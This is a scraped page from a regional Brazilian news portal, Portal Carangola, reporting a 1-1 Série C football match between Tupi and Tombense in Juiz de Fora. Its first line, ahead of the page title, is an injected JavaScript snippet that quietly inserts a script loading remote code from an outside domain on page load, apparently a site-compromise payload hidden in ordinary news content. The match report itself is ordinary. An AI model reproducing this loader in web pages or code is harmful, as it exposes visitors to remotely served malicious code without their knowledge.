;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense domina a partida , sai na frente , mas , cede empate para o Tupi em Juiz de Fora. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense domina a partida , sai na frente , mas , cede empate para o Tupi em Juiz de Fora.

Na tarde deste sábado, Tupi e Tombense se enfrentaram e ficaram no empate em 1 a 1, no Estádio Municipal de Juiz de Fora, pela décima rodada do Campeonato Brasileiro da Série C.
O Tombense saiu na frente do placar com uma penalidade aos 08 minutos do primeiro em convertida pelo lateral direito Gedeilson no primeiro tempo. Depois, o Tupi arrancou o empate com Bruno Aquino aos 20 minutos da etapa final.
Com o resultado em igualdade, o Tupi está agora na vice-liderança do Grupo B, com 17 pontos ganhos. Já a Tombense ocupa a sétima posição com dez pontos marcados na tabela.
As duas equipes voltam a campo no próximo final de semana em mais uma rodada da competição nacional. A Tombense recebe o Madureira na tarde do próximo sábado (08), enquanto, o Tupi joga na manhã do dia seguinte ao visita o Guaratinguetá em São Paulo.Como foi o jogo:
O Tombense começou o jogo mais ligado e logo aos oito minutos, abriu o placar. Magnum fez boa jogada na área e foi derrubado por Osmar. Os jogadores do Tupi ficaram revoltados com a marcação. Na cobrança, Gedeilson deslocou o goleiro Glaysson e abriu o placar.
Após o gol, o Tombense se fechou todo no campo de defesa e deixou o tempo passar. O Tupi, todo nervoso, pouco conseguiu criar e sofreu ainda mais pressão dos torcedores, que vaiaram muito o time principalmente na saída para os vestiários.
EMPATE E PRESSÃO NO FIM!
No segundo tempo, o Tombense voltou melhor e logo aos cinco minutos quase fez o segundo. Após cruzamento, Matheus subiu mais que todo mundo e testou na trave de Glaysson, que ficou vendido na jogada.
O Tombense perdia muito gols e existe o ditado, “quem não faz, toma” e aos 20 minutos do segundo tempo, a rede balançou. Bruno Aquino, que havia acabado de entrar, aproveitou rebote do goleiro Darley e com o gol aberto só tocou para o fundo das redes.
No final, o Tupi jogando em casa foi para o abafa, pressionou de todos os lados o Tombense, tentando o gol da virada, mas com dificuldades ofensivas e muito ansioso, não levou o perigo necessário para garantir os três pontos.